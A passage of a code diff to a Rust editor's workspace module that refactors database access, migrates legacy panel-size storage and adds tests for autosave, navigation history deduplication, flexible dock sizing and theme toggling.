.get_or_create_remote_connection(connection_options) .await .context("fetching serialized ssh project")?; - let serialized_workspace = - persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id); + let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id); let (window_bounds, display) = if let Some(bounds) = window_bounds_env_override() { (Some(WindowBounds::Windowed(bounds)), None) @@ -9789,7 +10415,7 @@ pub fn remote_workspace_position_from_db( .and_then(|workspace| { Some((workspace.display?, workspace.window_bounds.map(|b| b.0)?)) }) - .or_else(|| persistence::read_default_window_bounds()); + .or_else(|| 
persistence::read_default_window_bounds(&kvp)); if let Some((serialized_display, serialized_bounds)) = restorable_bounds { (Some(serialized_bounds), Some(serialized_display)) @@ -9831,22 +10457,71 @@ pub fn with_active_or_new_workspace( } None => { let app_state = AppState::global(cx); - if let Some(app_state) = app_state.upgrade() { - open_new( - OpenOptions::default(), - app_state, - cx, - move |workspace, window, cx| f(workspace, window, cx), - ) - .detach_and_log_err(cx); - } + open_new( + OpenOptions::default(), + app_state, + cx, + move |workspace, window, cx| f(workspace, window, cx), + ) + .detach_and_log_err(cx); } } } +/// Reads a panel's pixel size from its legacy KVP format and deletes the legacy +/// key. This migration path only runs once per panel per workspace. +fn load_legacy_panel_size( + panel_key: &str, + dock_position: DockPosition, + workspace: &Workspace, + cx: &mut App, +) -> Option { + #[derive(Deserialize)] + struct LegacyPanelState { + #[serde(default)] + width: Option, + #[serde(default)] + height: Option, + } + + let workspace_id = workspace + .database_id() + .map(|id| i64::from(id).to_string()) + .or_else(|| workspace.session_id())?; + + let legacy_key = match panel_key { + "ProjectPanel" => { + format!("{}-{:?}", "ProjectPanel", workspace_id) + } + "OutlinePanel" => { + format!("{}-{:?}", "OutlinePanel", workspace_id) + } + "GitPanel" => { + format!("{}-{:?}", "GitPanel", workspace_id) + } + "TerminalPanel" => { + format!("{:?}-{:?}", "TerminalPanel", workspace_id) + } + _ => return None, + }; + + let kvp = db::kvp::KeyValueStore::global(cx); + let json = kvp.read_kvp(&legacy_key).log_err().flatten()?; + let state = serde_json::from_str::(&json).log_err()?; + let size = match dock_position { + DockPosition::Bottom => state.height, + DockPosition::Left | DockPosition::Right => state.width, + }?; + + cx.background_spawn(async move { kvp.delete_kvp(legacy_key).await }) + .detach_and_log_err(cx); + + Some(size) +} + #[cfg(test)] mod 
tests { - use std::{cell::RefCell, rc::Rc}; + use std::{cell::RefCell, rc::Rc, sync::Arc, time::Duration}; use super::*; use crate::{ @@ -9864,6 +10539,7 @@ mod tests { use project::{Project, ProjectEntryId}; use serde_json::json; use settings::SettingsStore; + use util::path; use util::rel_path::rel_path; #[gpui::test] @@ -10065,6 +10741,12 @@ mod tests { cx.add_window(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); cx.run_until_parked(); + multi_workspace_handle + .update(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + }) + .unwrap(); + let workspace_a = multi_workspace_handle .read_with(cx, |mw, _| mw.workspace().clone()) .unwrap(); @@ -10078,7 +10760,8 @@ mod tests { // Activate workspace A multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); @@ -10099,7 +10782,7 @@ mod tests { // Verify workspace A is active multi_workspace_handle .read_with(cx, |mw, _| { - assert_eq!(mw.active_workspace_index(), 0); + assert_eq!(mw.workspace(), &workspace_a); }) .unwrap(); @@ -10115,8 +10798,8 @@ mod tests { multi_workspace_handle .read_with(cx, |mw, _| { assert_eq!( - mw.active_workspace_index(), - 1, + mw.workspace(), + &workspace_b, "workspace B should be activated when it prompts" ); }) @@ -10582,46 +11265,125 @@ mod tests { } #[gpui::test] - async fn test_pane_navigation(cx: &mut gpui::TestAppContext) { + async fn test_autosave_on_focus_change_in_multibuffer(cx: &mut gpui::TestAppContext) { init_test(cx); let fs = FakeFs::new(cx.executor()); - let project = Project::test(fs, [], cx).await; let (workspace, cx) = cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + // Create a multibuffer-like item with two child focus handles, + // simulating individual buffer editors within a multibuffer. 
let item = cx.new(|cx| { - TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "1.txt", cx)]) + TestItem::new(cx) + .with_project_items(&[TestProjectItem::new(1, "1.txt", cx)]) + .with_child_focus_handles(2, cx) }); - let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); - let toolbar = pane.read_with(cx, |pane, _| pane.toolbar().clone()); - let toolbar_notify_count = Rc::new(RefCell::new(0)); - workspace.update_in(cx, |workspace, window, cx| { workspace.add_item_to_active_pane(Box::new(item.clone()), None, true, window, cx); - let toolbar_notification_count = toolbar_notify_count.clone(); - cx.observe_in(&toolbar, window, move |_, _, _, _| { - *toolbar_notification_count.borrow_mut() += 1 - }) - .detach(); }); - pane.read_with(cx, |pane, _| { - assert!(!pane.can_navigate_backward()); - assert!(!pane.can_navigate_forward()); + // Set autosave to OnFocusChange and focus the first child handle, + // simulating the user's cursor being inside one of the multibuffer's excerpts. + item.update_in(cx, |item, window, cx| { + SettingsStore::update_global(cx, |settings, cx| { + settings.update_user_settings(cx, |settings| { + settings.workspace.autosave = Some(AutosaveSetting::OnFocusChange); + }) + }); + item.is_dirty = true; + window.focus(&item.child_focus_handles[0], cx); }); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| assert_eq!(item.save_count, 0)); - item.update_in(cx, |item, _, cx| { - item.set_state("one".to_string(), cx); + // Moving focus from one child to another within the same item should + // NOT trigger autosave — focus is still within the item's focus hierarchy. 
+ item.update_in(cx, |item, window, cx| { + window.focus(&item.child_focus_handles[1], cx); + }); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| { + assert_eq!( + item.save_count, 0, + "Switching focus between children within the same item should not autosave" + ); }); - // Toolbar must be notified to re-render the navigation buttons - assert_eq!(*toolbar_notify_count.borrow(), 1); + // Blurring the item saves the file. This is the core regression scenario: + // with `on_blur`, this would NOT trigger because `on_blur` only fires when + // the item's own focus handle is the leaf that lost focus. In a multibuffer, + // the leaf is always a child focus handle, so `on_blur` never detected + // focus leaving the item. + item.update_in(cx, |_, window, _| window.blur()); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| { + assert_eq!( + item.save_count, 1, + "Blurring should trigger autosave when focus was on a child of the item" + ); + }); - pane.read_with(cx, |pane, _| { - assert!(pane.can_navigate_backward()); - assert!(!pane.can_navigate_forward()); + // Deactivating the window should also trigger autosave when a child of + // the multibuffer item currently owns focus. 
+ item.update_in(cx, |item, window, cx| { + item.is_dirty = true; + window.focus(&item.child_focus_handles[0], cx); + }); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| assert_eq!(item.save_count, 1)); + + cx.deactivate_window(); + item.read_with(cx, |item, _| { + assert_eq!( + item.save_count, 2, + "Deactivating window should trigger autosave when focus was on a child" + ); + }); + } + + #[gpui::test] + async fn test_pane_navigation(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, [], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "1.txt", cx)]) + }); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + let toolbar = pane.read_with(cx, |pane, _| pane.toolbar().clone()); + let toolbar_notify_count = Rc::new(RefCell::new(0)); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane(Box::new(item.clone()), None, true, window, cx); + let toolbar_notification_count = toolbar_notify_count.clone(); + cx.observe_in(&toolbar, window, move |_, _, _, _| { + *toolbar_notification_count.borrow_mut() += 1 + }) + .detach(); + }); + + pane.read_with(cx, |pane, _| { + assert!(!pane.can_navigate_backward()); + assert!(!pane.can_navigate_forward()); + }); + + item.update_in(cx, |item, _, cx| { + item.set_state("one".to_string(), cx); + }); + + // Toolbar must be notified to re-render the navigation buttons + assert_eq!(*toolbar_notify_count.borrow(), 1); + + pane.read_with(cx, |pane, _| { + assert!(pane.can_navigate_backward()); + assert!(!pane.can_navigate_forward()); }); workspace @@ -10638,6 +11400,128 @@ mod tests { }); } + /// Tests that the navigation history deduplicates entries for the same item. 
+ /// + /// When navigating back and forth between items (e.g., A -> B -> A -> B -> A -> B -> C), + /// the navigation history deduplicates by keeping only the most recent visit to each item, + /// resulting in [A, B, C] instead of [A, B, A, B, A, B, C]. This ensures that Go Back (Ctrl-O) + /// navigates through unique items efficiently: C -> B -> A, rather than bouncing between + /// repeated entries: C -> B -> A -> B -> A -> B -> A. + /// + /// This behavior prevents the navigation history from growing unnecessarily large and provides + /// a better user experience by eliminating redundant navigation steps when jumping between files. + #[gpui::test] + async fn test_navigation_history_deduplication(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + + let item_a = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "a.txt", cx)]) + }); + let item_b = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(2, "b.txt", cx)]) + }); + let item_c = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(3, "c.txt", cx)]) + }); + + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane(Box::new(item_a.clone()), None, true, window, cx); + workspace.add_item_to_active_pane(Box::new(item_b.clone()), None, true, window, cx); + workspace.add_item_to_active_pane(Box::new(item_c.clone()), None, true, window, cx); + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_a, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_b, false, false, window, cx); + }); + cx.run_until_parked(); 
+ + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_a, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_b, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_a, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_b, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_c, false, false, window, cx); + }); + cx.run_until_parked(); + + let backward_count = pane.read_with(cx, |pane, cx| { + let mut count = 0; + pane.nav_history().for_each_entry(cx, &mut |_, _| { + count += 1; + }); + count + }); + assert!( + backward_count <= 4, + "Should have at most 4 entries, got {}", + backward_count + ); + + workspace + .update_in(cx, |workspace, window, cx| { + workspace.go_back(pane.downgrade(), window, cx) + }) + .await + .unwrap(); + + let active_item = workspace.read_with(cx, |workspace, cx| { + workspace.active_item(cx).unwrap().item_id() + }); + assert_eq!( + active_item, + item_b.entity_id(), + "After first go_back, should be at item B" + ); + + workspace + .update_in(cx, |workspace, window, cx| { + workspace.go_back(pane.downgrade(), window, cx) + }) + .await + .unwrap(); + + let active_item = workspace.read_with(cx, |workspace, cx| { + workspace.active_item(cx).unwrap().item_id() + }); + assert_eq!( + active_item, + item_a.entity_id(), + "After second go_back, should be at item A" + ); + + pane.read_with(cx, |pane, _| { + assert!(pane.can_navigate_forward(), "Should be able to go forward"); + }); + } + #[gpui::test] async fn test_activate_last_pane(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -10736,6 +11620,7 @@ mod tests { 
assert!(workspace.right_dock().read(cx).is_open()); assert!(!panel.is_zoomed(window, cx)); assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx)); + assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx)); }); // Close the dock @@ -10747,6 +11632,7 @@ mod tests { assert!(!workspace.right_dock().read(cx).is_open()); assert!(!panel.is_zoomed(window, cx)); assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx)); + assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx)); }); // Open the dock @@ -11538,6 +12424,394 @@ mod tests { assert_eq!(active_item.item_id(), last_item.item_id()); }); } + + #[gpui::test] + async fn test_flexible_dock_sizing(cx: &mut gpui::TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.bounds.size.width = px(800.); + }); + + workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Right, 100, cx)); + workspace.add_panel(panel, window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + }); + + let (panel, resized_width, ratio_basis_width) = + workspace.update_in(cx, |workspace, window, cx| { + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "one.txt", cx)]) + }); + workspace.add_item_to_active_pane(Box::new(item), None, true, window, cx); + + let dock = workspace.right_dock().read(cx); + let workspace_width = workspace.bounds.size.width; + let initial_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should have an initial width"); + + assert_eq!(initial_width, workspace_width / 2.); + + workspace.resize_right_dock(px(300.), window, cx); + 
+ let dock = workspace.right_dock().read(cx); + let resized_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should keep its resized width"); + + assert_eq!(resized_width, px(300.)); + + let panel = workspace + .right_dock() + .read(cx) + .visible_panel() + .expect("flexible dock should have a visible panel") + .panel_id(); + + (panel, resized_width, workspace_width) + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.toggle_dock(DockPosition::Right, window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + + let dock = workspace.right_dock().read(cx); + let reopened_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should restore when reopened"); + + assert_eq!(reopened_width, resized_width); + + let right_dock = workspace.right_dock().read(cx); + let flexible_panel = right_dock + .visible_panel() + .expect("flexible dock should still have a visible panel"); + assert_eq!(flexible_panel.panel_id(), panel); + assert_eq!( + right_dock + .stored_panel_size_state(flexible_panel.as_ref()) + .and_then(|size_state| size_state.flex), + Some( + resized_width.to_f64() as f32 + / (workspace.bounds.size.width - resized_width).to_f64() as f32 + ) + ); + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.split_pane( + workspace.active_pane().clone(), + SplitDirection::Right, + window, + cx, + ); + + let dock = workspace.right_dock().read(cx); + let split_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should keep its user-resized proportion"); + + assert_eq!(split_width, px(300.)); + + workspace.bounds.size.width = px(1600.); + + let dock = workspace.right_dock().read(cx); + let resized_window_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should preserve proportional size on window resize"); + + assert_eq!( + resized_window_width, + workspace.bounds.size.width + * (resized_width.to_f64() as f32 / 
ratio_basis_width.to_f64() as f32) + ); + }); + } + + #[gpui::test] + async fn test_panel_size_state_persistence(cx: &mut gpui::TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Fixed-width panel: pixel size is persisted to KVP and restored on re-add. + { + let project = Project::test(fs.clone(), [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.set_random_database_id(); + workspace.bounds.size.width = px(800.); + }); + + let panel = workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| TestPanel::new(DockPosition::Left, 100, cx)); + workspace.add_panel(panel.clone(), window, cx); + workspace.toggle_dock(DockPosition::Left, window, cx); + panel + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.resize_left_dock(px(350.), window, cx); + }); + + cx.run_until_parked(); + + let persisted = workspace.read_with(cx, |workspace, cx| { + workspace.persisted_panel_size_state(TestPanel::panel_key(), cx) + }); + assert_eq!( + persisted.and_then(|s| s.size), + Some(px(350.)), + "fixed-width panel size should be persisted to KVP" + ); + + // Remove the panel and re-add a fresh instance with the same key. + // The new instance should have its size state restored from KVP. 
+ workspace.update_in(cx, |workspace, window, cx| { + workspace.remove_panel(&panel, window, cx); + }); + + workspace.update_in(cx, |workspace, window, cx| { + let new_panel = cx.new(|cx| TestPanel::new(DockPosition::Left, 100, cx)); + workspace.add_panel(new_panel, window, cx); + + let left_dock = workspace.left_dock().read(cx); + let size_state = left_dock + .panel::<TestPanel>() + .and_then(|p| left_dock.stored_panel_size_state(&p)); + assert_eq!( + size_state.and_then(|s| s.size), + Some(px(350.)), + "re-added fixed-width panel should restore persisted size from KVP" + ); + }); + } + + // Flexible panel: both pixel size and ratio are persisted and restored. + { + let project = Project::test(fs.clone(), [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.set_random_database_id(); + workspace.bounds.size.width = px(800.); + }); + + let panel = workspace.update_in(cx, |workspace, window, cx| { + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "one.txt", cx)]) + }); + workspace.add_item_to_active_pane(Box::new(item), None, true, window, cx); + + let panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Right, 100, cx)); + workspace.add_panel(panel.clone(), window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + panel + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.resize_right_dock(px(300.), window, cx); + }); + + cx.run_until_parked(); + + let persisted = workspace + .read_with(cx, |workspace, cx| { + workspace.persisted_panel_size_state(TestPanel::panel_key(), cx) + }) + .expect("flexible panel state should be persisted to KVP"); + assert_eq!( + persisted.size, None, + "flexible panel should not persist a redundant pixel size" + ); + let original_ratio = 
persisted.flex.expect("panel's flex should be persisted"); + + // Remove the panel and re-add: both size and ratio should be restored. + workspace.update_in(cx, |workspace, window, cx| { + workspace.remove_panel(&panel, window, cx); + }); + + workspace.update_in(cx, |workspace, window, cx| { + let new_panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Right, 100, cx)); + workspace.add_panel(new_panel, window, cx); + + let right_dock = workspace.right_dock().read(cx); + let size_state = right_dock + .panel::<TestPanel>() + .and_then(|p| right_dock.stored_panel_size_state(&p)) + .expect("re-added flexible panel should have restored size state from KVP"); + assert_eq!( + size_state.size, None, + "re-added flexible panel should not have a persisted pixel size" + ); + assert_eq!( + size_state.flex, + Some(original_ratio), + "re-added flexible panel should restore persisted flex" + ); + }); + } + } + + #[gpui::test] + async fn test_flexible_panel_left_dock_sizing(cx: &mut gpui::TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.bounds.size.width = px(900.); + }); + + // Step 1: Add a tab to the center pane then open a flexible panel in the left + // dock. With one full-width center pane the default ratio is 0.5, so the panel + // and the center pane each take half the workspace width. 
+ workspace.update_in(cx, |workspace, window, cx| { + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "one.txt", cx)]) + }); + workspace.add_item_to_active_pane(Box::new(item), None, true, window, cx); + + let panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Left, 100, cx)); + workspace.add_panel(panel, window, cx); + workspace.toggle_dock(DockPosition::Left, window, cx); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should have an active panel"); + + assert_eq!( + left_width, + workspace.bounds.size.width / 2., + "flexible left panel should split evenly with the center pane" + ); + }); + + // Step 2: Split the center pane vertically (top/bottom). Vertical splits do not + // change horizontal width fractions, so the flexible panel stays at the same + // width as each half of the split. + workspace.update_in(cx, |workspace, window, cx| { + workspace.split_pane( + workspace.active_pane().clone(), + SplitDirection::Down, + window, + cx, + ); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should still have an active panel after vertical split"); + + assert_eq!( + left_width, + workspace.bounds.size.width / 2., + "flexible left panel width should match each vertically-split pane" + ); + }); + + // Step 3: Open a fixed-width panel in the right dock. The right dock's default + // size reduces the available width, so the flexible left panel and the center + // panes all shrink proportionally to accommodate it. 
+ workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| TestPanel::new(DockPosition::Right, 200, cx)); + workspace.add_panel(panel, window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + + let right_dock = workspace.right_dock().read(cx); + let right_width = workspace + .dock_size(&right_dock, window, cx) + .expect("right dock should have an active panel"); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should still have an active panel"); + + let available_width = workspace.bounds.size.width - right_width; + assert_eq!( + left_width, + available_width / 2., + "flexible left panel should shrink proportionally as the right dock takes space" + ); + }); + + // Step 4: Toggle the right dock's panel to flexible. Now both docks use + // flex sizing and the workspace width is divided among left-flex, center + // (implicit flex 1.0), and right-flex. + workspace.update_in(cx, |workspace, window, cx| { + let right_dock = workspace.right_dock().clone(); + let right_panel = right_dock + .read(cx) + .visible_panel() + .expect("right dock should have a visible panel") + .clone(); + workspace.toggle_dock_panel_flexible_size( + &right_dock, + right_panel.as_ref(), + window, + cx, + ); + + let right_dock = right_dock.read(cx); + let right_panel = right_dock + .visible_panel() + .expect("right dock should still have a visible panel"); + assert!( + right_panel.has_flexible_size(window, cx), + "right panel should now be flexible" + ); + + let right_size_state = right_dock + .stored_panel_size_state(right_panel.as_ref()) + .expect("right panel should have a stored size state after toggling"); + let right_flex = right_size_state + .flex + .expect("right panel should have a flex value after toggling"); + + let left_dock = workspace.left_dock().read(cx); + let left_width = workspace + .dock_size(&left_dock, window, cx) + .expect("left dock should still have 
an active panel"); + let right_width = workspace + .dock_size(&right_dock, window, cx) + .expect("right dock should still have an active panel"); + + let left_flex = workspace + .default_dock_flex(DockPosition::Left) + .expect("left dock should have a default flex"); + + let total_flex = left_flex + 1.0 + right_flex; + let expected_left = left_flex / total_flex * workspace.bounds.size.width; + let expected_right = right_flex / total_flex * workspace.bounds.size.width; + assert_eq!( + left_width, expected_left, + "flexible left panel should share workspace width via flex ratios" + ); + assert_eq!( + right_width, expected_right, + "flexible right panel should share workspace width via flex ratios" + ); + }); + } + struct TestModal(FocusHandle); impl TestModal { @@ -11590,13 +12864,11 @@ mod tests { panel_1.panel_id() ); assert_eq!( - left_dock.read(cx).active_panel_size(window, cx).unwrap(), - panel_1.size(window, cx) + workspace.dock_size(&left_dock.read(cx), window, cx), + Some(px(300.)) ); - left_dock.update(cx, |left_dock, cx| { - left_dock.resize_active_panel(Some(px(1337.)), window, cx) - }); + workspace.resize_left_dock(px(1337.), window, cx); assert_eq!( workspace .right_dock() @@ -11626,7 +12898,12 @@ mod tests { panel_1.panel_id() ); assert_eq!( - right_dock.read(cx).active_panel_size(window, cx).unwrap(), + right_dock + .read(cx) + .active_panel_size() + .unwrap() + .size + .unwrap(), px(1337.) ); @@ -11664,8 +12941,8 @@ mod tests { panel_1.panel_id() ); assert_eq!( - left_dock.read(cx).active_panel_size(window, cx).unwrap(), - px(1337.) + workspace.dock_size(&left_dock.read(cx), window, cx), + Some(px(1337.)) ); // And the right dock should be closed as it no longer has any panels. assert!(!workspace.right_dock().read(cx).is_open()); @@ -11681,8 +12958,8 @@ mod tests { // since the panel orientation changed from vertical to horizontal. 
let bottom_dock = workspace.bottom_dock(); assert_eq!( - bottom_dock.read(cx).active_panel_size(window, cx).unwrap(), - panel_1.size(window, cx), + workspace.dock_size(&bottom_dock.read(cx), window, cx), + Some(px(300.)) ); // Close bottom dock and move panel_1 back to the left. bottom_dock.update(cx, |bottom_dock, cx| { @@ -13240,6 +14517,12 @@ mod tests { cx.add_window(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); cx.run_until_parked(); + multi_workspace_handle + .update(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + }) + .unwrap(); + let workspace_a = multi_workspace_handle .read_with(cx, |mw, _| mw.workspace().clone()) .unwrap(); @@ -13253,7 +14536,8 @@ mod tests { // Switch to workspace A multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); @@ -13298,7 +14582,8 @@ mod tests { // Switch to workspace B multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(1, window, cx); + let workspace = mw.workspaces().nth(1).unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); cx.run_until_parked(); @@ -13306,7 +14591,8 @@ mod tests { // Switch back to workspace A multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); cx.run_until_parked(); @@ -13339,10 +14625,79 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + cx.set_global(db::AppDatabase::test_new()); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } + #[gpui::test] + async fn test_toggle_theme_mode_persists_and_updates_active_theme(cx: &mut TestAppContext) { + use settings::{ThemeName, ThemeSelection}; + use theme::SystemAppearance; + use 
zed_actions::theme::ToggleMode; + + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let settings_fs: Arc<dyn Fs> = fs.clone(); + + fs.insert_tree(path!("/root"), json!({ "file.rs": "fn main() {}\n" })) + .await; + + // Build a test project and workspace view so the test can invoke + // the workspace action handler the same way the UI would. + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + + // Seed the settings file with a plain static light theme so the + // first toggle always starts from a known persisted state. + workspace.update_in(cx, |_workspace, _window, cx| { + *SystemAppearance::global_mut(cx) = SystemAppearance(theme::Appearance::Light); + settings::update_settings_file(settings_fs.clone(), cx, |settings, _cx| { + settings.theme.theme = Some(ThemeSelection::Static(ThemeName("One Light".into()))); + }); + }); + cx.executor().advance_clock(Duration::from_millis(200)); + cx.run_until_parked(); + + // Confirm the initial persisted settings contain the static theme + // we just wrote before any toggling happens. + let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap(); + assert!(settings_text.contains(r#""theme": "One Light""#)); + + // Toggle once. This should migrate the persisted theme settings + // into light/dark slots and enable system mode. + workspace.update_in(cx, |workspace, window, cx| { + workspace.toggle_theme_mode(&ToggleMode, window, cx); + }); + cx.executor().advance_clock(Duration::from_millis(200)); + cx.run_until_parked(); + + // 1. Static -> Dynamic + // This assertion checks that the theme changed from static to dynamic. 
+ let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap(); + let parsed: serde_json::Value = settings::parse_json_with_comments(&settings_text).unwrap(); + assert_eq!( + parsed["theme"], + serde_json::json!({ + "mode": "system", + "light": "One Light", + "dark": "One Dark" + }) + ); + + // 2. Toggle again; this should switch the mode to light. + workspace.update_in(cx, |workspace, window, cx| { + workspace.toggle_theme_mode(&ToggleMode, window, cx); + }); + cx.executor().advance_clock(Duration::from_millis(200)); + cx.run_until_parked(); + + let settings_text = SettingsStore::load_settings(&settings_fs).await.unwrap(); + assert!(settings_text.contains(r#""mode": "light""#)); + } + fn dirty_project_item(id: u64, path: &str, cx: &mut App) -> Entity<TestProjectItem> { + let item = TestProjectItem::new(id, path, cx); + item.update(cx, |item, _| { @@ -13413,4 +14768,72 @@ mod tests { assert!(panel.is_zoomed(window, cx)); }); } + + #[gpui::test] + async fn test_panels_stay_open_after_position_change_and_settings_update( + cx: &mut gpui::TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + + // Add two panels to the left dock and open it. 
+ let (panel_a, panel_b) = workspace.update_in(cx, |workspace, window, cx| { + let panel_a = cx.new(|cx| TestPanel::new(DockPosition::Left, 100, cx)); + let panel_b = cx.new(|cx| TestPanel::new(DockPosition::Left, 101, cx)); + workspace.add_panel(panel_a.clone(), window, cx); + workspace.add_panel(panel_b.clone(), window, cx); + workspace.left_dock().update(cx, |dock, cx| { + dock.set_open(true, window, cx); + dock.activate_panel(0, window, cx); + }); + (panel_a, panel_b) + }); + + workspace.update_in(cx, |workspace, _, cx| { + assert!(workspace.left_dock().read(cx).is_open()); + }); + + // Simulate a feature flag changing default dock positions: both panels + // move from Left to Right. + workspace.update_in(cx, |_workspace, _window, cx| { + panel_a.update(cx, |p, _cx| p.position = DockPosition::Right); + panel_b.update(cx, |p, _cx| p.position = DockPosition::Right); + cx.update_global::<SettingsStore, _>(|_, _| {}); + }); + + // Both panels should now be in the right dock. + workspace.update_in(cx, |workspace, _, cx| { + let right_dock = workspace.right_dock().read(cx); + assert_eq!(right_dock.panels_len(), 2); + }); + + // Open the right dock and activate panel_b (simulating the user + // opening the panel after it moved). 
